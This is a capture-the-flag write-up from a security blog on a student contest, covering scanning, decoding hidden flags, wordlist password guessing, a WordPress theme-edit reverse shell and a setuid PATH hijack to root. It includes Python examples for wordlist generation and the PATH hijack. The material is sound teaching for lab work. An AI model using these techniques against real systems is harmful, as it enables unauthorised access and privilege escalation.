Safetech Blog - Security Tips and Tricks


by Oana Stoian

CTF-USV Writeup

This write-up was written after the CTF-USV 2016 contest, in which students had to capture 7 flags. We used the Facebook CTF platform, where each flag was assigned to a country.

The theme of the Capture the Flag contest was Game of Thrones. Everyone is watching the series, right? 🙂

 

Running nmap showed a LOT of open ports:

nmap

Trying to fingerprint the open services with amap, we noticed strange banners on most of the open ports.

 

amap

 

A quick Google search gave us a clue as to why so many ports are open:

fuzz_here

 

It looks like the portspoof tool is being used to confuse a potential attacker by answering on a lot of ports with fake service signatures, which is why the amap banners looked odd.
We decided to focus on the well-known services first and see where that would get us.
On port 80 there is a web server, but it only returns an Access forbidden message:

access-forbidden

 

Looking at the HTTP response headers, we quickly noticed a string in the X-XSS-Protection header that looked base64 encoded (a normal value for that header is something like "1; mode=block"):

xss-protection

Decoding the string gives our first flag:
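One way to automate the header check described above, as an added example that is not code from the original write-up: parse a raw HTTP response, attempt a strict base64 decode of every header value, and keep only the values that decode to printable text (short values such as "gzip" are valid base64 but decode to binary junk, which is why the printable filter is needed). The response below is constructed; the real header's content, i.e. the flag, is not reproduced here.

```python
import base64
import binascii
import string

# Constructed sample response (not the real server's output). The X-XSS-Protection value is a
# base64 string of our own making; the contest flag is not reproduced here.
SAMPLE_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "X-XSS-Protection: bm90IHRoZSByZWFsIGZsYWc=\r\n"
    "Content-Length: 27\r\n"
    "\r\n"
    "<h1>Access forbidden!</h1>"
)

PRINTABLE = set(string.printable.encode())


def parse_headers(raw_response):
    """Split a raw HTTP response into (status line, list of (name, value)) pairs."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def try_base64(value):
    """Return the decoded text if value is strict base64 that decodes to printable ASCII,
    otherwise None. validate=True rejects non-alphabet characters (spaces, ';', '=' in the
    middle) and binascii.Error covers bad length/padding."""
    try:
        data = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not data or any(b not in PRINTABLE for b in data):
        return None
    return data.decode("ascii")


def find_encoded_headers(raw_response):
    """Map header name -> decoded text for every header whose value looks like base64 text."""
    _, headers = parse_headers(raw_response)
    found = {}
    for name, value in headers:
        decoded = try_base64(value)
        if decoded is not None:
            found[name] = decoded
    return found


if __name__ == "__main__":
    for name, decoded in find_encoded_headers(SAMPLE_RESPONSE).items():
        print(f"{name}: {decoded!r}")
```

In practice the raw response would come from a socket or from a proxy log, but the check is the same: every header is a candidate, not just the one that happened to hold the flag in this contest.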

We continued looking at the common services and tried to connect to the SSH server. Of course I didn't expect to find a valid password as well, but I was curious whether there was a banner.

A dragon says welcome to the curious visitors 🙂

dragon-in-banner-ssh

Looking closer at the dragon image, we can see that it has something to do with AES ECB. Below the dragon is an encrypted string, and near the dragon's tail is the key.

Using an online AES decryption tool, the second flag was revealed:

So, what other common services are there?

Well, there is a MySQL server on TCP 3306 and a Squid proxy server, not on the default TCP 3128 but on TCP 3129.... that is too close to the default to be unintentional. 🙂

What if we set it as a proxy in our browser and try to access that web server on port 80 again?
30 seconds later this page was displayed:

first-page

 

Firing up nikto (remember that it has to be run through the proxy as well, using its -useproxy option) turns up a /blog directory, among other information.

blog

Indeed, we found the blog of The Seven Kingdoms 🙂

blog1

 

We analyzed the information on the blog and two posts caught our attention: one of them is password protected and the other one is entitled "I have a message for you!"

 

hodor-message

We checked the picture for metadata; the page source apparently contained nothing interesting either, except for a folder named hodor where the picture was stored. Browsing to that folder gave another clue, a zip archive named (what else?) hodor.zip, containing a file named hodor:

hodor-message3

The file extracted from the archive contains a "JFIF" header, so it is a JPEG image. I renamed it with a .jpg extension, and here is our third flag:

hodor

 

 

This translates to:

Now let's return to the other, password-protected post. Trying to put together all the information gathered so far, nothing rang a bell... we just knew there was a password and we had to crack it.
From our experience as penetration testers, it is always a good idea to build a custom dictionary based on the application being tested.
A useful tool for generating a dictionary from the words found on a website is cewl.... and the password for the protected post turned out to be Westerosi. With it we got our fourth flag:

password-protected


Now that we are done with Hodor, it seems that Khaleesi, mother of dragons, has something to hide. But where?
Thinking again about all the services that nmap revealed, about the hint that "She uses Field Training Preparation for her army" (F.T.P.), and about what kind of service would have a username and a password, we could try a brute force against each service with the username mother_of_dragons.

 

The post says that "the password is in front of your eyes", so why not try "in front of your eyes" as the password? A little bit tricky, right? >:)
The FTP service, on port 21211, accepted the credentials mother_of_dragons / "in front of your eyes".

On the FTP server there are two files: a readme.txt, which leads us to a hidden note.txt. The note says:

“I always forgot passwords, so for my blog account I used my children’s names.

-= Daenerys =-”

The next step is to log into WordPress as mother_of_dragons with a password composed of her children's names. A little Googling tells you that the dragons are named Drogon, Viserion and Rhaegal.
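Both passwords so far came from building a targeted wordlist: the cewl harvest for the protected post above, and the children's names for the WordPress login. The following Python, added here and not part of the original write-up, does the two steps in miniature: a cewl-style word harvest from page HTML (tags, script and style blocks dropped, entities unescaped, words of a minimum length kept in order of first appearance with case preserved), and a generator for every ordering of a few seed names joined by common separators, which a checker function then walks. The HTML and the checker are constructed stand-ins; the real WordPress password is not reproduced on the page, so none of the generated candidates is claimed to be it.

```python
import re
from html import unescape
from itertools import permutations

# Constructed stand-in for the blog's HTML; the real pages are not reproduced here.
SAMPLE_HTML = """<html><head><title>The Seven Kingdoms</title>
<style>body { color: black; }</style></head>
<body><h1>News from the Westerosi court</h1>
<p>Winter is coming to Winterfell. Hodor carries the message; Daenerys,
mother of dragons, rides Drogon &amp; the others follow.</p>
<script>var trackingToken = "ignoreme";</script>
</body></html>"""

# Drop whole <script>/<style> blocks first (their content is not visible text), then any tag.
BLOCK_RE = re.compile(r"<(script|style)\b[^>]*>.*?</\1\s*>", re.I | re.S)
TAG_RE = re.compile(r"<[^>]+>")


def cewl_words(html, min_len=5):
    """cewl-style harvest: unique words of at least min_len letters from the visible text,
    in order of first appearance, case preserved (so 'Westerosi' keeps its capital W)."""
    text = TAG_RE.sub(" ", BLOCK_RE.sub(" ", html))
    text = unescape(text)  # after tag stripping, so '&lt;b&gt;' cannot turn into a tag
    seen, words = set(), []
    for word in re.findall(r"[A-Za-z]{%d,}" % min_len, text):
        if word not in seen:
            seen.add(word)
            words.append(word)
    return words


def name_combos(names, separators=("", "_", "-", ".")):
    """Every ordering of two or more seed names joined by each separator, in the given
    case and all-lowercase. For three capitalised names that is (6 + 6) * 4 * 2 = 96."""
    out, seen = [], set()
    for r in range(2, len(names) + 1):
        for perm in permutations(names, r):
            for sep in separators:
                joined = sep.join(perm)
                for cand in (joined, joined.lower()):
                    if cand not in seen:
                        seen.add(cand)
                        out.append(cand)
    return out


def first_match(candidates, check):
    """Return the first candidate for which check(candidate) is true, or None.
    In a real run check() would submit the candidate, e.g. a POST to the blog's
    password form or an FTP login attempt; here it is whatever the caller supplies."""
    for cand in candidates:
        if check(cand):
            return cand
    return None


if __name__ == "__main__":
    print("site words:", cewl_words(SAMPLE_HTML))
    combos = name_combos(["Drogon", "Viserion", "Rhaegal"])
    print(len(combos), "name candidates, e.g.", combos[:4])
```

The order matters as much as the content: site-specific words and name combinations are a few dozen guesses, so they should be tried before any generic wordlist, and against a login form rate limiting or lockout should be checked first.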

profile_wordpress

 

The fifth flag can be found in Daenerys' profile:

Now that we have access to WordPress with administrative rights, we can execute commands and get a reverse shell.

I edited one of the theme files, put some PHP code in it, and here is the reverse shell:

shell

I started looking for various information on the system, such as running processes and which user accounts are present... and when I looked in the home folder of the http user, I found the sixth flag.

reward-flag

 

This decodes to:

Also in the /srv/http/ folder there is a file named winterfell_messenger, owned by root and with the setuid bit set. We ran the binary to see what happens:

f7_0

Analyzing the binary with strings, we see that it uses the cat command to read /root/message.txt. The interesting part is that cat is called by its bare name rather than by an absolute path, so the lookup depends on the PATH environment variable, which we control. That means we can prepend a directory of our own to PATH, put a file named "cat" with arbitrary commands in it, and have the setuid binary execute it as root 💡

f7_2
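To make the PATH hijack concrete, here is an added Python example that is not from the original write-up. A stand-in for winterfell_messenger runs cat <file> through /bin/sh by bare command name, once with a clean PATH and once with a directory containing a fake cat prepended, so the two outputs can be compared. The fake cat, the message file and the directory names are all hypothetical. It demonstrates only PATH resolution, not the privilege boundary: nothing here is setuid, so the fake cat runs as the invoking user, whereas on the target it would run with the binary's root privileges.

```python
import os
import shlex
import shutil
import subprocess
import tempfile

# Hypothetical payload that stands in for the attacker's "cat". A real one would do something
# useful with root privileges (e.g. copy /bin/sh somewhere and set its setuid bit); this one
# only proves that it ran instead of the real cat and shows the arguments it received.
FAKE_CAT = """#!/bin/sh
echo "HIJACKED: fake cat ran instead of the real one, args: $*"
"""


def make_hijack_dir():
    """Create a directory holding an executable named 'cat'; the attacker prepends it to PATH."""
    hijack_dir = tempfile.mkdtemp(prefix="hijack-")
    fake = os.path.join(hijack_dir, "cat")
    with open(fake, "w") as f:
        f.write(FAKE_CAT)
    os.chmod(fake, 0o755)
    return hijack_dir


def run_messenger(path_env, message_file):
    """Stand-in for winterfell_messenger: like the real binary it runs 'cat <file>' through
    the shell with a bare command name, so the shell resolves 'cat' by walking PATH.
    The absolute /bin/sh is used so that only the lookup of 'cat' depends on path_env."""
    cmd = "cat " + shlex.quote(message_file)
    result = subprocess.run(["/bin/sh", "-c", cmd], env={"PATH": path_env},
                            capture_output=True, text=True, check=False)
    return result.stdout.strip()


def demo(system_path="/usr/bin:/bin"):
    """Run the stand-in twice, with a clean PATH and with the hijack dir prepended.
    Returns (path that 'cat' resolves to under the hijacked PATH, clean output, hijacked output)."""
    hijack_dir = make_hijack_dir()
    work_dir = tempfile.mkdtemp(prefix="msg-")
    message_file = os.path.join(work_dir, "message.txt")  # stands in for /root/message.txt
    with open(message_file, "w") as f:
        f.write("constructed message, not the contest flag\n")
    try:
        hijacked_path = hijack_dir + os.pathsep + system_path
        resolved = shutil.which("cat", path=hijacked_path)
        clean = run_messenger(system_path, message_file)
        hijacked = run_messenger(hijacked_path, message_file)
        return resolved, clean, hijacked
    finally:
        shutil.rmtree(hijack_dir)
        shutil.rmtree(work_dir)


if __name__ == "__main__":
    for label, value in zip(("cat resolves to", "clean PATH", "hijacked PATH"), demo()):
        print(f"{label}: {value}")
```

The fix on the defending side is the mirror image: a privileged program should call /bin/cat (or better, open the file itself) and should not trust the PATH it inherited from an unprivileged caller.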

Once we are root, the seventh flag is ours:

f7_3

 

That's all folks!

We hope you will enjoy getting all the flags at least as much as we enjoyed creating them 🙂
